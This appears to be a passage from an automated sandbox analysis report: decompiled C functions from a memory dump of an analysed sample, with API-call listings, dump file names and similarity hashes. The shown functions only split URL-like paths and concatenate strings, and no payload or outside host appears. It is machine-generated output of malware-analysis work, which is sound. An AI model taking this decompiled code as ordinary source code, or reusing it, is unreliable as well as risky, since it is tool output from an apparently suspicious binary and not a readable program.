                  						_t39 = _a4;
                  						_t22 = E00DCA97B(_t39);
                  						_v8 = _t22;
                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                  							_a4 = _t39;
                  						} else {
                  							_t26 = _t22 + 2;
                  							_a4 = _t22 + 2;
                  							_t22 = E00DCA97B(_t26);
                  							_v8 = _t22;
                  						}
                  						if(_t22 == 0) {
                  							__imp__(_t34, _a4);
                  							 *_t30 = 0x2f;
                  							 *((char*)(_t30 + 1)) = 0;
                  						} else {
                  							_t42 = _t22 - _a4;
                  							memcpy(_t34, _a4, _t42);
                  							 *((char*)(_t34 + _t42)) = 0;
                  							__imp__(_t30, _v8);
                  						}
                  						 *_a8 = _t34;
                  						_t37 = 1;
                  						 *_a12 = _t30;
                  					}
                  				}
                  				return _t37;
                  			}















                  APIs
                  • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00DC8390,00000000,00000000,00000000,05119698,?,?,00DC4680,?,05119698), ref: 00DC46FB
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                    • Part of subcall function 00DCA97B: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00DC4729,00000000,00000001,00000001,?,?,00DC8390,00000000,00000000,00000000,05119698), ref: 00DCA989
                    • Part of subcall function 00DCA97B: StrChrA.SHLWAPI(?,0000003F,?,?,00DC8390,00000000,00000000,00000000,05119698,?,?,00DC4680,?,05119698,0000EA60,?), ref: 00DCA993
                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00DC8390,00000000,00000000,00000000,05119698,?,?,00DC4680), ref: 00DC4759
                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00DC4769
                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00DC4775
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                  • String ID:
                  • API String ID: 3767559652-0
                  • Opcode ID: 903f7621e9980a4f739a9a095e57cd6b393145e3ad2c2a663db35eb8c6786988
                  • Instruction ID: 97d8a718dea6938c2261b6a5040ed809de5318656dad45d381cae3b029b68d7c
                  • Opcode Fuzzy Hash: 903f7621e9980a4f739a9a095e57cd6b393145e3ad2c2a663db35eb8c6786988
                  • Instruction Fuzzy Hash: E421907650425BEBCB029F68CC95FAE7FA8EF17390B194058F9499B252D734C9019BF0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00DC7AC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                  				void* _v8;
                  				void* _t18;
                  				int _t25;
                  				int _t29;
                  				int _t34;
                  
                  				_t29 = lstrlenW(_a4);
                  				_t25 = lstrlenW(_a8);
                  				_t18 = E00DC75C4(_t25 + _t29 + _t25 + _t29 + 2);
                  				_v8 = _t18;
                  				if(_t18 != 0) {
                  					_t34 = _t29 + _t29;
                  					memcpy(_t18, _a4, _t34);
                  					_t10 = _t25 + 2; // 0x2
                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                  				}
                  				return _v8;
                  			}









                  APIs
                  • lstrlenW.KERNEL32(004F0053,74B05520,?,00000008,0511931C,?,00DC4CC5,004F0053,0511931C,?,?,?,?,?,?,00DC3858), ref: 00DC7AD8
                  • lstrlenW.KERNEL32(00DC4CC5,?,00DC4CC5,004F0053,0511931C,?,?,?,?,?,?,00DC3858), ref: 00DC7ADF
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                  • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00DC4CC5,004F0053,0511931C,?,?,?,?,?,?,00DC3858), ref: 00DC7AFF
                  • memcpy.NTDLL(74B069A0,00DC4CC5,00000002,00000000,004F0053,74B069A0,?,?,00DC4CC5,004F0053,0511931C), ref: 00DC7B12
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File
                  Similarity
                  • API ID: lstrlenmemcpy$AllocateHeap
                  • String ID:
                  • API String ID: 2411391700-0
                  • Opcode ID: 6226db1c20925bbda6c32314c2787e605fe68d506af07d84656545ba7f01eb98
                  • Instruction ID: 5505b78e7017caf0de2e670ef6a5e643addbcf8184f95263c37382bd1f8151b6
                  • Opcode Fuzzy Hash: 6226db1c20925bbda6c32314c2787e605fe68d506af07d84656545ba7f01eb98
                  • Instruction Fuzzy Hash: F7F04972900119BBCF11EFE8CC89D8E7BACEF083547054066FD08D7202E631EA109BB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • lstrlen.KERNEL32(0511887A,00000000,00000000,00000000,00DC6CA0,00000000), ref: 00DC74BF
                  • lstrlen.KERNEL32(?), ref: 00DC74C7
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                  • lstrcpy.KERNEL32(00000000,0511887A), ref: 00DC74DB
                  • lstrcat.KERNEL32(00000000,?), ref: 00DC74E6
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File
                  Similarity
                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                  • String ID:
                  • API String ID: 74227042-0
                  • Opcode ID: 22c9170d3d423f8e97f8d4d608c3bb83478e2cea7e7f73191f229f5957bb1da2
                  • Instruction ID: f2fde5b7a7c264688bfa279d82d656141ef894cc89506d76a170d928a40f5018
                  • Opcode Fuzzy Hash: 22c9170d3d423f8e97f8d4d608c3bb83478e2cea7e7f73191f229f5957bb1da2
                  • Instruction Fuzzy Hash: 23E06D73505223A78A119BE49C48C9BBBACEF89621305041AF604D3210C72088059BF0
                  Uniqueness

                  Uniqueness Score: -1.00%